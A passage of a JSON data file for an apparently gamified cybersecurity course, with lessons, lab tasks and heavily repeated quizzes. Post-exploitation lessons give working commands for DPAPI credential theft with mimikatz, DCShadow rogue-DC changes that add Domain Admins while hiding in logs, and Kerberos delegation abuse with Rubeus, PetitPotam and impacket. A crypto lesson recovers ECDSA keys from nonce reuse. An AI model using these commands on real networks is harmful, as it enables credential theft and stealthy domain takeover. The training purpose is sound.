ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"post-dpapi-abuse","cat":"Post-Exploitation","title":"DPAPI Credential Extraction","diff":4,"xp":250,"intro":"Decrypt Windows DPAPI-protected secrets: browser passwords, Wi-Fi keys, RDP creds.","sections":[{"type":"text","content":"Windows DPAPI protects secrets with the user's password-derived master key. If you have the user's password or NTLM hash, you can decrypt everything DPAPI protects: Chrome passwords, Credential Manager, Wi-Fi profiles."},{"type":"code","lang":"bash","content":"# Dump DPAPI master keys\nmimikatz# dpapi::masterkey /in:C:Users\\userAppDataRoamingMicrosoftProtectSIDMASTERKEY /rpc\n# Decrypt Chrome passwords\nmimikatz# dpapi::chrome /in:C:Users\\userAppDataLocalGoogleChromeUser DataDefaultLogin Data\n# Or with SharpDPAPI\nSharpDPAPI.exe triage\nSharpDPAPI.exe credentials /password:UserPassword123\n# Decrypt Credential Manager\nmimikatz# vault::cred /patch"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DPAPI protects secrets using...","opts":["A global Windows key","The user's password-derived master key","No encryption","Hardware TPM only"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"post-dcshadow","cat":"Post-Exploitation","title":"DCShadow: Rogue Domain Controller","diff":5,"xp":300,"intro":"Register a rogue DC to push changes to Active Directory undetected.","sections":[{"type":"text","content":"DCShadow registers your machine as a domain controller, pushes arbitrary AD changes (add admin, modify SPNs, set SID history) via replication, then unregisters. Changes appear as normal DC replication in logs."},{"type":"code","lang":"bash","content":"# DCShadow requires DA-level privileges\n# Terminal 1: start the rogue DC\nmimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupID /value:512\n# 512 = Domain Admins primary group ID\n\n# Terminal 2: push the change\nmimikatz# lsadump::dcshadow /push\n\n# The change propagates via normal replication\n# Logs show legitimate replication traffic from your 'DC'\n# Hard to detect because it looks like normal DC-to-DC sync"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCShadow is stealthy because...","opts":["It uses encryption","Changes appear as normal DC replication traffic","It's fast","It doesn't require credentials"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"post-kerberos-delegation-chain","cat":"Post-Exploitation","title":"Kerberos Delegation Attack Chains","diff":5,"xp":300,"intro":"Chain unconstrained, constrained, and RBCD delegation for cross-domain escalation.","sections":[{"type":"text","content":"Delegation is meant to let services act on behalf of users. Abuse it: unconstrained delegation captures any TGT that authenticates to the compromised service. Constrained delegation lets you impersonate any user to specific services. RBCD lets you impersonate anyone to any service you configure."},{"type":"code","lang":"bash","content":"# Unconstrained delegation: capture TGTs\nRubeus.exe monitor /interval:5 /filteruser:DC$\n# Coerce the DC to authenticate (PetitPotam)\npython3 PetitPotam.py compromised_host DC\n# Capture DC's TGT -> DCSync\n\n# Constrained delegation: impersonate admin\nRubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt\n\n# RBCD: configure trust + impersonate\nimpacket-rbcd domain/user:pass -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write -dc-ip DC\nimpacket-getST domain/'EVIL$':'pass' -spn cifs/TARGET -impersonate administrator"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Unconstrained delegation captures...","opts":["Passwords","TGTs of any user that authenticates to the compromised service","File shares","Network traffic"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"crypto-elliptic-curve-attacks","cat":"Cryptography","title":"Elliptic Curve Cryptography Attacks","diff":4,"xp":250,"intro":"Invalid curve attacks, twist attacks, and ECDSA nonce reuse.","sections":[{"type":"text","content":"ECC vulnerabilities: invalid curve attack (force operations on a weak curve), twist security (operations on the curve's twist leak bits), and ECDSA nonce reuse (reusing k in two signatures reveals the private key)."},{"type":"code","lang":"python","content":"# ECDSA nonce reuse: if same k is used for two signatures\n# Given (r, s1, msg1) and (r, s2, msg2) with same r (= same k)\n# k = (msg1 - msg2) / (s1 - s2) mod n\n# private_key = (s1 * k - msg1) / r mod n\n\nfrom Crypto.Util.number import inverse\nn = curve_order\nk = ((hash1 - hash2) * inverse(s1 - s2, n)) % n\nprivate_key = ((s1 * k - hash1) * inverse(r, n)) % n\nprint(f'Private key recovered: {private_key}')"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"ECDSA nonce reuse allows recovery of...","opts":["The message","The private key","The public key","The curve parameters"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"crypto-quantum-threats","cat":"Cryptography","title":"Post-Quantum Cryptography","diff":4,"xp":250,"intro":"Quantum computers break RSA and ECC \u2014 prepare for the transition.","sections":[{"type":"text","content":"Shor's algorithm on a quantum computer factors large numbers and computes discrete logs in polynomial time, breaking RSA, DH, and ECC. NIST selected Kyber (key exchange) and Dilithium (signatures) as post-quantum standards."},{"type":"code","lang":"bash","content":"# Current status:\n# RSA-2048: broken by ~4000 logical qubits (estimated 2030-2040)\n# AES-256: quantum resistant (Grover's halves keyspace to 128-bit equivalent)\n# SHA-256: quantum resistant (reduced to 128-bit collision resistance)\n\n# NIST PQC standards (2024):\n# Key exchange: ML-KEM (Kyber)\n# Signatures: ML-DSA (Dilithium), SLH-DSA (SPHINCS+)\n# Test with liboqs:\npython3 -c 'from oqs import KeyEncapsulation; kem = KeyEncapsulation(\"Kyber512\"); pk,sk = kem.generate_keypair(); ct,ss = kem.encap_secret(pk); print(f\"Shared secret: {ss[:16].hex()}\")'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Shor's algorithm breaks...","opts":["AES","RSA and ECC (factoring and discrete log)","SHA-256","All encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"forensics-firmware-analysis","cat":"Forensics & IR","title":"Firmware Extraction and Analysis","diff":4,"xp":250,"intro":"Extract, unpack, and analyze IoT device firmware for vulnerabilities.","sections":[{"type":"text","content":"Firmware analysis: dump the flash chip (SPI, JTAG), extract the filesystem with binwalk, find hardcoded credentials, analyze binaries for vulns, and identify the update mechanism."},{"type":"code","lang":"bash","content":"# Extract firmware filesystem\nbinwalk -e firmware.bin\n# Identify filesystem\nfile firmware.bin\nbinwalk firmware.bin  # shows embedded filesystems\n\n# Search for credentials\ngrep -rn 'password|passwd|secret|key' extracted_fs/\nstrings firmware.bin | grep -iE 'admin|root|password|key='\n\n# Find interesting binaries\nfind extracted_fs/ -executable -type f\n# Check for known vulnerable libraries\nfind extracted_fs/ -name '*.so' | xargs strings | grep -i 'version'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Firmware analysis starts with...","opts":["Running the device","Extracting and unpacking the firmware binary","Connecting to the network","Reading documentation"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"forensics-memory-rootkit-detection","cat":"Forensics & IR","title":"Detecting Rootkits via Memory Forensics","diff":5,"xp":300,"intro":"Use memory analysis to find what the rootkit is hiding from the OS.","sections":[{"type":"text","content":"Rootkits hook system calls to hide processes, files, and connections. Memory forensics bypasses the hooks by reading raw memory: compare Volatility's pslist (uses OS data structures) vs psscan (carves process headers from raw memory). Differences reveal hidden processes."},{"type":"code","lang":"bash","content":"# Compare process listings\nvol.py -f memory.dmp --profile=Win10x64 pslist > pslist.txt\nvol.py -f memory.dmp --profile=Win10x64 psscan > psscan.txt\n# Processes in psscan but NOT in pslist = hidden by rootkit\ndiff pslist.txt psscan.txt\n\n# Check for SSDT hooks (system call table modification)\nvol.py -f memory.dmp --profile=Win10x64 ssdt | grep -v 'ntoskrnl|win32k'\n\n# Check for inline hooks (detours/trampolines)\nvol.py -f memory.dmp --profile=Win10x64 apihooks"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Rootkits are detected in memory by...","opts":["Checking file sizes","Comparing OS-reported processes vs raw memory-carved processes","Scanning with antivirus","Checking network traffic"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name 